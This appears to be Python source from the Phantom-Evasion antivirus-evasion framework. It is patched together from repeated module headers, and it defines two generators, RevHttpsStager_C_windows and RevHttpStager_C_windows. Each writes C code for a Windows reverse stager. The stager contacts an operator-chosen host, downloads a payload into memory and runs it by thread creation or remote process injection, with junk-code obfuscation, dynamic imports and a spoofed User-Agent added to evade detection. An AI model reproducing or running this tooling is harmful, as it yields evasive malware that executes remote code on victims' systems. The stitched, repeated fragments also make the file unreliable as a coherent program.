#    You should have received a copy of the GNU General Public License                 #
#   along with Phantom-Evasion.  If not, see <http://www.gnu.org/licenses/>.           #
#                                                                                      #
########################################################################################

import sys
from random import shuffle
sys.path.append("Modules/payloads/auxiliar")
from usefull import varname_creator
from usefull import Junkmathinject
from usefull import windows_evasion
from usefull import spawn_multiple_process
from usefull import close_brackets_multiproc
from usefull import CheckForBackslash

# Positional command-line arguments of this generator script. Only the
# first one is normalised (CheckForBackslash); the process count is the
# only value converted to int, the rest stay raw strings.
PathOrFilename = CheckForBackslash(sys.argv[1])
Procname, WaitBeforeCheck, Evasion_Junkcode = (
    sys.argv[2],
    sys.argv[3],
    sys.argv[4],
)
SpawnMultiProc = int(sys.argv[5])

# Random identifiers handed to the emitted source; created in the same
# order as before so the name sequence does not change.
RandBool, RandEntry, RandHandle = (
    varname_creator(),
    varname_creator(),
    varname_creator(),
)
#   along with Phantom-Evasion.  If not, see <http://www.gnu.org/licenses/>.           #
#                                                                                      #
########################################################################################

import sys
from random import shuffle
from random import sample
sys.path.append("Modules/payloads/auxiliar")
from usefull import varname_creator
from usefull import Junkmathinject
from usefull import windows_evasion
from usefull import spawn_multiple_process
from usefull import close_brackets_multiproc
from usefull import CheckForBackslash

# Command-line inputs: listener host (backslash-checked), listener port
# (kept as a string) and the number of processes to spawn.
Lhost = CheckForBackslash(sys.argv[1])
Lport = sys.argv[2]
SpawnMultiProc = int(sys.argv[3])

# Random identifiers for the emitted source, generated in a fixed order.
Randlpv, Randpointer, Randhand, Randthread, RandhInternet = (
    varname_creator(),
    varname_creator(),
    varname_creator(),
    varname_creator(),
    varname_creator(),
)
     #    GNU General Public License for more details.                                      #
     #                                                                                      #  
     #    You should have received a copy of the GNU General Public License                 #
     #   along with Phantom-Evasion.  If not, see <http://www.gnu.org/licenses/>.           #
     #                                                                                      #
     ########################################################################################

import sys
from random import shuffle  
sys.path.append("Modules/payloads/auxiliar")
from usefull import varname_creator
from usefull import Junkmathinject
from usefull import CheckForBackslash
from usefull import generic_evasion

# The one-liner passed on the command line, normalised by CheckForBackslash.
BashOneliner = CheckForBackslash(sys.argv[1])

# Random identifiers for the emitted source.
Randvarname = varname_creator()
Randptr = varname_creator()

# Eight independent junk-code fragments; Junkmathinject is called eight
# times, left to right, exactly as the original enumerated assignments did.
(
    Junkcode_01,
    Junkcode_02,
    Junkcode_03,
    Junkcode_04,
    Junkcode_05,
    Junkcode_06,
    Junkcode_07,
    Junkcode_08,
) = (Junkmathinject() for _ in range(8))
def RevHttpsStager_C_windows(ModOpt):
    """Emit the C source of a Windows HTTPS (WinINet) stager into ``Source.c``.

    The function builds one string, ``Ret_code``, holding a C program that
    opens a WinINet session, connects to ``ModOpt["Lhost"]:ModOpt["Lport"]``
    with ``INTERNET_FLAG_SECURE``, requests a URI produced by
    ``UriGenerator``, reads the response into a buffer obtained through
    ``inject_utils.Win_MemLocal`` and finally passes that buffer to the
    thread / remote-injection helpers chosen by ``ModOpt["ExecMethod"]``.
    The finished string is written with ``WriteSource("Source.c", ...)``.

    Args:
        ModOpt: option dictionary shared with the other generators. Keys read
            here: ``Lhost``, ``Lport``, ``Arch``, ``MemAlloc``, ``ExecMethod``,
            ``Outformat``, ``Reflective``, ``DynImport``, ``JI``, ``JF``,
            ``EF``, ``JR``. Keys written (the dict is mutated in place):
            ``Lhost`` (backslash-checked), ``Buff``, ``Lpvoid``, ``Decoder``,
            ``Bufflen`` and, when ``DynImport`` is true, ``NtdllHandle`` /
            ``Ker32Handle``.

    Returns:
        None; the only result is the file written by ``WriteSource``.

    Notes for reviewers:
        * ``IncludeShuffler``, ``WindowsDefend``, ``UriGenerator``,
          ``inject_utils``, ``JunkInjector`` and ``WriteSource`` are not
          defined in this snippet; they come from the enclosing module.
        * Many locals (``Randlpv2``, ``SumValueFunc``, ``RandCharArray``,
          ``RandCharset``, ``RandInteger``, ``RandRecv_int``,
          ``ChecksumFunction``, ``RandCharPtr2``, ``RandFuncFlag1``,
          ``RandFuncFlag2``, ``Arch``) are assigned and never used. Removing
          them presumably changes how many times ``varname_creator`` is
          called and therefore the generated identifiers — TODO confirm
          before cleaning up.
        * ``MemAlloc`` / ``ExecMethod`` are read from ``ModOpt`` twice.
        * The ``DynImport`` branch emits the ntdll/kernel32
          ``GetModuleHandle`` lines twice (once before ``$:START`` and once
          after ``$:EVA``), each time with freshly generated names.
    """

    MemAlloc = ModOpt["MemAlloc"]
    ExecMethod = ModOpt["ExecMethod"]

    ModOpt["Lhost"] = CheckForBackslash(ModOpt["Lhost"])

    # Random identifiers for the emitted C source. Only the handles,
    # flag/result variables and the read pointer are referenced below.
    Randlpv = varname_creator()
    Randlpv2 = varname_creator()
    Randpointer = varname_creator()
    RandhInternet = varname_creator()
    RandhConnect = varname_creator()
    RandhRequest = varname_creator()
    RandwFlags = varname_creator()
    RandISOResult = varname_creator()
    RandisSend = varname_creator()
    RandwByteRead = varname_creator()
    RandisRead = varname_creator()
    SumValueFunc = varname_creator()
    RandCharArray = varname_creator()
    RandCharset = varname_creator()
    RandInteger = varname_creator()
    RandRecv_int = varname_creator()
    ChecksumFunction = varname_creator()
    RandCharPtr2 = varname_creator()
    RandFuncFlag1 = varname_creator()
    RandFuncFlag2 = varname_creator()

    # Re-read of options already captured above (no observable difference).
    Arch = ModOpt["Arch"]
    MemAlloc = ModOpt["MemAlloc"]
    ExecMethod = ModOpt["ExecMethod"]

    # Tell the allocation helper which C variable receives the buffer.
    # For shared-section allocation the LPVOID gets its own name; otherwise
    # buffer and LPVOID are the same variable.
    if ModOpt["MemAlloc"] in ["SharedSection", "SS"]:

        ModOpt["Buff"] = Randlpv
        ModOpt["Lpvoid"] = varname_creator()
    else:
        ModOpt["Buff"] = Randlpv
        ModOpt["Lpvoid"] = Randlpv

    # Strings, not booleans/ints: the downstream helpers appear to expect
    # them in this form — TODO confirm against inject_utils.
    ModOpt["Decoder"] = "False"

    ModOpt["Bufflen"] = "8000000"

    Ret_code = ""

    IncludeList = [
        "#include <stdlib.h>\n", "#include <windows.h>\n",
        "#include <stdio.h>\n", "#include <string.h>\n", "#include <time.h>\n",
        "#include <math.h>\n"
    ]

    # Standard includes are emitted in shuffled order; tlhelp32/wininet are
    # always appended last so they follow windows.h.
    Ret_code += IncludeShuffler(IncludeList) + "#include <tlhelp32.h>\n"

    Ret_code += "#include <wininet.h>\n"

    # Entry point: plain main() for an exe, DllMain gated on
    # DLL_PROCESS_ATTACH for a dll. The braces opened here are closed at the
    # very end of the function, after JunkInjector has run.
    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        if ModOpt["Reflective"] == True:

            Ret_code += "#include \"ReflectiveLoader.h\"\n"

        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"
        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    # First copy of the module-handle prologue (see docstring: duplicated
    # below with new names after the $:EVA marker).
    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()

        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"

    # "$:START" / "$:EVA" / "$:END" are literal markers left in the source;
    # presumably consumed by JunkInjector to locate insertion regions —
    # TODO confirm.
    Ret_code += "$:START\n"

    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])

    Ret_code += "$:EVA\n"

    if ModOpt["DynImport"] == True:

        # Dynamic-import variant: every WinINet call goes through a FARPROC
        # obtained with GetProcAddress on the wininet.dll module handle.
        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()
        Wininet = varname_creator()
        NdcInternetOpenA = varname_creator()
        NdcInternetConnectA = varname_creator()
        NdcHttpOpenRequestA = varname_creator()
        NdcInternetSetOption = varname_creator()
        NdcHttpSendRequestA = varname_creator()
        NdcInternetReadFile = varname_creator()

        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
        Ret_code += "HANDLE " + Wininet + " = GetModuleHandle(\"wininet.dll\");\n"
        Ret_code += "FARPROC " + NdcInternetOpenA + " = GetProcAddress(" + Wininet + ", \"InternetOpenA\");\n"
        # NULL agent string: the generated program sets no User-Agent itself.
        Ret_code += "HINTERNET " + RandhInternet + " = (HINTERNET)" + NdcInternetOpenA + "(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);\n"
        Ret_code += "if (" + RandhInternet + " != NULL){\n"

        Ret_code += "FARPROC " + NdcInternetConnectA + " = GetProcAddress(" + Wininet + ", \"InternetConnectA\");\n"
        # Lhost is quoted into the C source, Lport is pasted as a bare token;
        # neither is validated here, so a malformed option produces a C
        # compile error rather than a Python one.
        Ret_code += "HINTERNET " + RandhConnect + " = (HINTERNET)" + NdcInternetConnectA + "(" + RandhInternet + ", \"" + ModOpt[
            "Lhost"] + "\"," + ModOpt[
                "Lport"] + ", NULL,NULL, INTERNET_SERVICE_HTTP,INTERNET_FLAG_SECURE,1);\n"
        Ret_code += "if (" + RandhConnect + " != NULL){\n"
        Ret_code += "FARPROC " + NdcHttpOpenRequestA + " = GetProcAddress(" + Wininet + ", \"HttpOpenRequestA\");\n"
        # NULL verb (GET per the WinINet documentation) and a raw bitmask of
        # INTERNET_FLAG_* values written as hex literals; the names are not
        # spelled out in the source — verify against wininet.h when auditing.
        Ret_code += "HINTERNET " + RandhRequest + " = (HINTERNET)" + NdcHttpOpenRequestA + "(" + RandhConnect + ",NULL,\"" + UriGenerator(
        ) + "\",NULL, NULL, 0, 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 | 0x00800000 | 0x00002000 | 0x00001000,1);\n"
        Ret_code += "if (" + RandhRequest + "!= NULL){\n"
        # Security-flag bitmask applied via INTERNET_OPTION_SECURITY_FLAGS;
        # again hex literals only. The return value is stored but never
        # checked by the generated code.
        Ret_code += "DWORD " + RandwFlags + " = 0x00002000 | 0x00001000 | 0x00000200 | 0x00000100 | 0x00000080;\n"

        Ret_code += "FARPROC " + NdcInternetSetOption + " = GetProcAddress(" + Wininet + ", \"InternetSetOption\");\n"

        Ret_code += "BOOL " + RandISOResult + " = " + NdcInternetSetOption + "(" + RandhRequest + ",INTERNET_OPTION_SECURITY_FLAGS, &" + RandwFlags + ", sizeof (" + RandwFlags + ") );\n"
        Ret_code += "LPVOID " + Randlpv + ";\n"

        # Allocation of the receive buffer (size ModOpt["Bufflen"]).
        Ret_code += inject_utils.Win_MemLocal(ModOpt)

        Ret_code += "char * " + Randpointer + " = " + Randlpv + ";\n"

        Ret_code += "FARPROC " + NdcHttpSendRequestA + " = GetProcAddress(" + Wininet + ", \"HttpSendRequestA\");\n"
        Ret_code += "BOOL " + RandisSend + " = " + NdcHttpSendRequestA + "(" + RandhRequest + ", NULL, 0, NULL, 0);\n"
        Ret_code += "if (" + RandisSend + "){\n"
        Ret_code += "FARPROC " + NdcInternetReadFile + " = GetProcAddress(" + Wininet + ", \"InternetReadFile\");\n"
        Ret_code += "DWORD " + RandwByteRead + ";\n"
        # Read loop: 1024 bytes per call here vs. 8192 in the static-import
        # branch below — the two branches are otherwise parallel.
        Ret_code += "do{\n"
        Ret_code += "BOOL " + RandisRead + " = " + NdcInternetReadFile + "(" + RandhRequest + "," + Randpointer + ", 1024, &" + RandwByteRead + ");\n"

    else:

        # Static-import variant: same call sequence with direct WinINet
        # symbols.
        Ret_code += "HINTERNET " + RandhInternet + " = InternetOpenA(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);\n"
        Ret_code += "if (" + RandhInternet + " != NULL){\n"
        Ret_code += "HINTERNET " + RandhConnect + " = InternetConnectA(" + RandhInternet + ",\"" + ModOpt[
            "Lhost"] + "\"," + ModOpt[
                "Lport"] + ", NULL,NULL, INTERNET_SERVICE_HTTP,INTERNET_FLAG_SECURE,1);\n"
        Ret_code += "if (" + RandhConnect + " != NULL){\n"
        Ret_code += "HINTERNET " + RandhRequest + " = HttpOpenRequestA(" + RandhConnect + ",NULL,\"" + UriGenerator(
        ) + "\",NULL, NULL, 0, 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 | 0x00800000 | 0x00002000 | 0x00001000,1);\n"
        Ret_code += "if (" + RandhRequest + "!= NULL){\n"
        Ret_code += "DWORD " + RandwFlags + " = 0x00002000 | 0x00001000 | 0x00000200 | 0x00000100 | 0x00000080;\n"
        Ret_code += "BOOL " + RandISOResult + " = InternetSetOption (" + RandhRequest + ",INTERNET_OPTION_SECURITY_FLAGS, &" + RandwFlags + ", sizeof (" + RandwFlags + ") );\n"
        Ret_code += "LPVOID " + Randlpv + ";\n"

        Ret_code += inject_utils.Win_MemLocal(ModOpt)
        Ret_code += "char * " + Randpointer + " = " + Randlpv + ";\n"
        Ret_code += "BOOL " + RandisSend + " = HttpSendRequestA(" + RandhRequest + ", NULL, 0, NULL, 0);\n"
        Ret_code += "if (" + RandisSend + "){\n"
        Ret_code += "DWORD " + RandwByteRead + ";\n"
        Ret_code += "do{\n"
        Ret_code += "BOOL " + RandisRead + " = InternetReadFile(" + RandhRequest + "," + Randpointer + ",8192, &" + RandwByteRead + ");\n"

    # Common tail of the read loop: advance the write pointer by the bytes
    # read and stop on the first zero-length read. The BOOL result of the
    # read call is not consulted.
    Ret_code += Randpointer + " += " + RandwByteRead + ";\n"
    Ret_code += "}while(" + RandwByteRead + " > 0);\n"

    # Substring test on the allocation mode string (e.g. an "RW/..." mode)
    # decides whether a protection change is emitted before a local thread.
    if "RW/" in MemAlloc and ExecMethod == "Thread":

        Ret_code += inject_utils.Win_ChangeMemProtect(ModOpt)

    # Uses ModOpt["ExecMethod"] here while the check above used the local
    # ExecMethod; both hold the same value.
    if ModOpt["ExecMethod"] == "Thread":

        Ret_code += inject_utils.Win_LocalThread(ModOpt)
    else:
        Ret_code += inject_utils.Win_RemoteInjection(ModOpt)

    # Closes the four "if (... != NULL){" / "if (isSend){" blocks opened
    # above (the do/while was already closed).
    Ret_code += "}}}}\n"

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])

    # Junk insertion runs over the whole body before the entry point is
    # closed, so the closing braces below are never touched by it.
    Ret_code = JunkInjector(Ret_code, ModOpt["JI"], ModOpt["JF"], ModOpt["EF"],
                            ModOpt["JR"])

    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":

        # Closes the DLL_PROCESS_ATTACH block, then DllMain itself.
        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c", Ret_code)
#    You should have received a copy of the GNU General Public License                 #
#   along with Phantom-Evasion.  If not, see <http://www.gnu.org/licenses/>.           #
#                                                                                      #
########################################################################################

import sys
from random import shuffle
sys.path.append("Modules/payloads/auxiliar")
from usefull import varname_creator
from usefull import Junkmathinject
from usefull import windows_evasion
from usefull import spawn_multiple_process
from usefull import close_brackets_multiproc
from usefull import CheckForBackslash

# Command-line inputs: the payload text (backslash-checked) and the
# number of processes to spawn.
Powershell_payload = CheckForBackslash(sys.argv[1])
SpawnMultiProc = int(sys.argv[2])

# Random identifier for the emitted source.
Randvarname = varname_creator()

# Ten independent junk-code fragments; Junkmathinject is invoked ten
# times left to right, matching the original one-per-line assignments.
(
    Junkcode_01,
    Junkcode_02,
    Junkcode_03,
    Junkcode_04,
    Junkcode_05,
    Junkcode_06,
    Junkcode_07,
    Junkcode_08,
    Junkcode_09,
    Junkcode_10,
) = (Junkmathinject() for _ in range(10))
def RevHttpStager_C_windows(ModOpt):
    """Emit the C source of a Windows plain-HTTP (Winsock) stager into ``Source.c``.

    Builds ``Ret_code``, a C program that initialises Winsock, resolves
    ``ModOpt["Lhost"]`` with ``gethostbyname``, connects a TCP socket to
    ``ModOpt["Lport"]``, sends one hand-written ``GET`` request for a
    ``UriGenerator`` URI, receives the reply into a buffer obtained through
    ``inject_utils.Win_MemLocal``, skips past the first ``\\r\\n\\r\\n`` and
    hands the remainder to the thread / remote-injection helpers selected by
    ``ModOpt["ExecMethod"]``. The string is written with
    ``WriteSource("Source.c", ...)``.

    Args:
        ModOpt: option dictionary shared with the other generators. Keys read:
            ``Lhost``, ``Lport``, ``Arch``, ``MemAlloc``, ``ExecMethod``,
            ``Outformat``, ``Reflective``, ``DynImport``, ``JI``, ``JF``,
            ``EF``, ``JR``. Keys written (in place): ``Buff``, ``Lpvoid``,
            ``Decoder``, ``Bufflen`` and, when ``DynImport`` is true,
            ``NtdllHandle`` / ``Ker32Handle``. Unlike the HTTPS variant,
            ``ModOpt["Lhost"]`` itself is not rewritten; the checked value
            lives in the local ``Lhost``.

    Returns:
        None; the only result is the file written by ``WriteSource``.

    Notes for reviewers:
        * ``IncludeShuffler``, ``WindowsDefend``, ``UriGenerator``,
          ``inject_utils``, ``JunkInjector`` and ``WriteSource`` come from the
          enclosing module, not this snippet.
        * ``Randlpv2`` and ``Arch`` are assigned and never used;
          ``MemAlloc`` / ``ExecMethod`` are read twice.
        * Detection-relevant literals emitted verbatim: the fixed
          ``User-Agent`` string, ``Connection: Keep-Alive`` and the
          ``GET /<uri> HTTP/1.1`` request line built into a ``char[400]``.
        * The ``gethostbyname`` line uses ``ModOpt["Lhost"]`` (unchecked)
          whereas the Host header uses the backslash-checked local ``Lhost``.
    """

    Lhost = CheckForBackslash(ModOpt["Lhost"])
    Lport = ModOpt["Lport"]
    MemAlloc = ModOpt["MemAlloc"]
    ExecMethod = ModOpt["ExecMethod"]

    # Random identifiers for the emitted C source.
    Randlpv = varname_creator()
    Randlpv2 = varname_creator()
    Randpointer2 = varname_creator()
    Randbuff = varname_creator()
    Randversion = varname_creator()
    Randwsadata = varname_creator()
    RandRevtarget = varname_creator()
    Randsock = varname_creator()
    RandSocket = varname_creator()
    RandRecv_int = varname_creator()

    # Re-read of options already captured above (no observable difference).
    Arch = ModOpt["Arch"]
    MemAlloc = ModOpt["MemAlloc"]
    ExecMethod = ModOpt["ExecMethod"]

    # Tell the allocation helper which C variable receives the buffer.
    if ModOpt["MemAlloc"] in ["SharedSection", "SS"]:

        ModOpt["Buff"] = Randlpv
        ModOpt["Lpvoid"] = varname_creator()
    else:
        ModOpt["Buff"] = Randlpv
        ModOpt["Lpvoid"] = Randlpv

    # Strings, not booleans/ints — the downstream helpers appear to expect
    # this form; TODO confirm against inject_utils.
    ModOpt["Decoder"] = "False"

    ModOpt["Bufflen"] = "1000000"

    Ret_code = ""
    # winsock2.h is emitted before the shuffled standard includes (and hence
    # before windows.h), with _WIN32_WINNT pinned first.
    Ret_code += "#define _WIN32_WINNT 0x0500\n"
    Ret_code += "#include <winsock2.h>\n"

    IncludeList = [
        "#include <stdlib.h>\n", "#include <windows.h>\n",
        "#include <stdio.h>\n", "#include <string.h>\n", "#include <time.h>\n",
        "#include <math.h>\n"
    ]

    Ret_code += IncludeShuffler(IncludeList) + "#include <tlhelp32.h>\n"

    # Entry point: main() for an exe, DllMain gated on DLL_PROCESS_ATTACH for
    # a dll. The braces opened here are closed at the very end, after
    # JunkInjector has run.
    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        if ModOpt["Reflective"] == True:

            Ret_code += "#include \"ReflectiveLoader.h\"\n"

        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"
        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    # First copy of the module-handle prologue; repeated with fresh names
    # after the $:EVA marker below.
    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()

        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"

    # "$:START" / "$:EVA" / "$:END" are literal markers left in the source;
    # presumably consumed by JunkInjector — TODO confirm.
    Ret_code += "$:START\n"

    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])

    Ret_code += "$:EVA\n"

    # Buffer pointer is declared here as char*; Win_MemLocal is expected to
    # assign (not re-declare) it — TODO confirm against inject_utils.
    Ret_code += "char * " + Randlpv + ";\n"
    Ret_code += "WORD " + Randversion + " = MAKEWORD(2,2);WSADATA " + Randwsadata + ";\n"

    if ModOpt["DynImport"] == True:

        # Dynamic-import variant: WSAStartup/WSACleanup are resolved with
        # GetProcAddress on the ws2_32.dll handle; the remaining socket calls
        # (socket, gethostbyname, connect, send, recv, closesocket) are still
        # emitted as direct symbols.
        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()
        WS2_32 = varname_creator()
        NdcWSAStartup = varname_creator()
        NdcWSACleanup = varname_creator()
        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
        Ret_code += "HANDLE " + WS2_32 + " = GetModuleHandle(\"ws2_32.dll\");\n"
        Ret_code += "FARPROC " + NdcWSAStartup + " = GetProcAddress(" + WS2_32 + ", \"WSAStartup\");\n"
        Ret_code += "FARPROC " + NdcWSACleanup + " = GetProcAddress(" + WS2_32 + ", \"WSACleanup\");\n"
        # No "\n" after the opening brace here; the closing line follows on
        # the same generated line (harmless to the C compiler).
        Ret_code += "if (" + NdcWSAStartup + "(" + Randversion + ", &" + Randwsadata + ") < 0){"
        Ret_code += NdcWSACleanup + "();exit(1);}\n"
    else:

        Ret_code += "if (WSAStartup(" + Randversion + ", &" + Randwsadata + ") < 0){\n"
        Ret_code += "WSACleanup();exit(1);}\n"

    Ret_code += "struct hostent * " + RandRevtarget + ";struct sockaddr_in " + Randsock + ";SOCKET " + RandSocket + ";\n"
    Ret_code += RandSocket + " = socket(AF_INET, SOCK_STREAM, 0);\n"

    # INVALID_SOCKET check exists only in the dynamic-import variant and, unlike
    # the gethostbyname check right below, calls WSACleanup() directly rather
    # than through the resolved NdcWSACleanup pointer.
    if ModOpt["DynImport"] == True:

        Ret_code += "if (" + RandSocket + " == INVALID_SOCKET){closesocket(" + RandSocket + ");WSACleanup();exit(1);}\n"

    # Host resolution uses the unchecked ModOpt["Lhost"], not the local Lhost.
    Ret_code += RandRevtarget + " = gethostbyname(\"" + ModOpt[
        "Lhost"] + "\");\n"  # raw ModOpt["Lhost"]

    if ModOpt["DynImport"] == True:

        Ret_code += "if (" + RandRevtarget + " == NULL){closesocket(" + RandSocket + ");" + NdcWSACleanup + "();exit(1);}\n"
    else:
        Ret_code += "if (" + RandRevtarget + " == NULL){closesocket(" + RandSocket + ");WSACleanup();exit(1);}\n"

    Ret_code += "memcpy(&" + Randsock + ".sin_addr.s_addr, " + RandRevtarget + "->h_addr, " + RandRevtarget + "->h_length);\n"
    Ret_code += Randsock + ".sin_family = AF_INET;\n"
    # Lport is pasted as a bare C token inside htons((...)); not validated here.
    Ret_code += Randsock + ".sin_port = htons((" + ModOpt[
        "Lport"] + "));\n"  # raw ModOpt["Lport"]
    # connect() failure path also calls WSACleanup() directly in both variants.
    Ret_code += "if ( connect(" + RandSocket + ", (struct sockaddr *)&" + Randsock + ", sizeof(" + Randsock + ")) ){closesocket(" + RandSocket + ");WSACleanup();exit(1);}\n"
    # Request is a fixed-size char[400] initialiser containing the generated
    # URI, Host header and a hard-coded User-Agent; the generator does not
    # check the resulting length against 400 — overly long Lhost/URI values
    # would surface as a C compile diagnostic rather than a Python error.
    Ret_code += "char " + Randbuff + "[400] = \"GET /" + UriGenerator(
    ) + " HTTP/1.1\\r\\nHost: " + Lhost + ":" + Lport + "\\r\\nConnection: Keep-Alive\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\\r\\n\\r\\n\";\n"
    Ret_code += "send(" + RandSocket + "," + Randbuff + ", strlen( " + Randbuff + " ),0);\n"
    Ret_code += "Sleep(300);\n"

    # Allocation of the receive buffer (size ModOpt["Bufflen"]).
    Ret_code += inject_utils.Win_MemLocal(ModOpt)

    # Receive loop: 1024 bytes per recv(), advancing the write pointer by
    # the returned count, until recv() returns 0 or a negative value.
    Ret_code += "char * " + Randpointer2 + " = " + Randlpv + ";\n"
    Ret_code += "int " + RandRecv_int + ";\n"
    Ret_code += "do {" + RandRecv_int + " = recv(" + RandSocket + ", " + Randpointer2 + ", 1024, 0);\n"
    Ret_code += "" + Randpointer2 + " += " + RandRecv_int + ";\n"
    Ret_code += "}while ( " + RandRecv_int + " > 0 );\n"

    if ModOpt["DynImport"] == True:

        Ret_code += "closesocket(" + RandSocket + ");" + NdcWSACleanup + "();\n"

    else:
        Ret_code += "closesocket(" + RandSocket + ");WSACleanup();\n"

    # Substring test on the allocation mode string decides whether a
    # protection change is emitted before a local thread.
    if "RW/" in MemAlloc and ExecMethod == "Thread":

        Ret_code += inject_utils.Win_ChangeMemProtect(ModOpt)

    # Skip the HTTP headers: the generated code assumes a "\r\n\r\n"
    # terminator is present in the received data (strstr result is not
    # NULL-checked).
    Ret_code += Randlpv + " = strstr(" + Randlpv + ", \"\\r\\n\\r\\n\") + 4;\n"

    # Uses ModOpt["ExecMethod"] here while the check above used the local
    # ExecMethod; both hold the same value.
    if ModOpt["ExecMethod"] == "Thread":

        Ret_code += inject_utils.Win_LocalThread(ModOpt)
    else:
        Ret_code += inject_utils.Win_RemoteInjection(ModOpt)

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])

    # Junk insertion runs over the body before the entry point is closed.
    Ret_code = JunkInjector(Ret_code, ModOpt["JI"], ModOpt["JF"], ModOpt["EF"],
                            ModOpt["JR"])

    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":

        # Closes the DLL_PROCESS_ATTACH block, then DllMain itself.
        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c", Ret_code)